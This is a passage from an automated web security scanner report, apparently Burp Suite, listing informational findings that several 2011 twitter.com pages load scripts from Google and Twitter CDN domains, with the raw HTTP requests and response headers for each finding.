<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.393. http://twitter.com/account/complete

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/complete

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /account/complete HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225098-32422-55297
ETag: "7a8adef0dbc3ef0c42eb7b03abd1a754"
Last-Modified: Fri, 28 Jan 2011 14:31:38 GMT
X-Runtime: 0.02921
Content-Type: text/html; charset=utf-8
Content-Length: 9562
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMzVkMjBkODc1ZGM5ZGI5Nzg4YmNiMWM0MDIyZjk3%250AMTg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--2bce05f22e5c92b42da6ed23c2bbac492123e41a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.394. http://twitter.com/account/complete

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/complete

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /account/complete HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224738-66922-55667
ETag: "eedf9b80f78cbd1a5f2a1c6e52bbc763"
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
X-Runtime: 0.03729
Content-Type: text/html; charset=utf-8
Content-Length: 9562
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlODI5MmUyYjNjZTVmMGNlMzU4NGJlM2JjNGVkMTQ1%250AYTA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--9ac191e704e10670dc258c58c1b2e5f1e8b10885; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.395. http://twitter.com/account/resend_password

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/resend_password

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224738-99420-18584
ETag: "f922c6202d9a9e6c0d31ac6afdb14eff"
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
X-Runtime: 0.02589
Content-Type: text/html; charset=utf-8
Content-Length: 9745
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMDI3MTAzYTcyMjcyM2VhZDQyN2NiOGRlNTEyNWE5%250AZTc6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--c7b8267380c61b856a14710cd449961d09a51a3c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.396. http://twitter.com/account/resend_password

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/resend_password

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234373-64080-16855
ETag: "b02fad5237a5af47e0588230109bbf33"
Last-Modified: Fri, 28 Jan 2011 17:06:13 GMT
X-Runtime: 0.02076
Content-Type: text/html; charset=utf-8
Content-Length: 9614
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.397. http://twitter.com/account/resend_password

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/resend_password

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225097-35641-62367
ETag: "36c3d8393c36beacce84d1f0e053aae1"
Last-Modified: Fri, 28 Jan 2011 14:31:37 GMT
X-Runtime: 0.01483
Content-Type: text/html; charset=utf-8
Content-Length: 9745
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMmIzZDhkNWIzZmNkZjJmZDVkZmM4Zjg1MzRlMjAx%250ANGU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--aa38ccbd7b634a31265b6d55953168e34206df29; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.398. http://twitter.com/ajpiano

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ajpiano

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /ajpiano HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-9839-24776
ETag: "6cfb51a84c8ef82cfc30accecbfd12df"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01348
Content-Type: text/html; charset=utf-8
Content-Length: 48953
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.399. http://twitter.com/androidnewsblog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /androidnewsblog

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /androidnewsblog HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-13968-5956
ETag: "b0e4ae48560abd6de3188c44a0de9618"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01122
Content-Type: text/html; charset=utf-8
Content-Length: 49638
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.400. http://twitter.com/backstreetboys

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /backstreetboys

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /backstreetboys HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265308-18449-44248
ETag: "470b046c74671df35cc91c1d8792ddb5"
Last-Modified: Sat, 29 Jan 2011 01:41:48 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 47038
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/twitter.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296246715" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/geov1.js?1296246715" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/api.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/dismissable.js?1296246715" type="text/javascript"></script>
...[SNIP]...

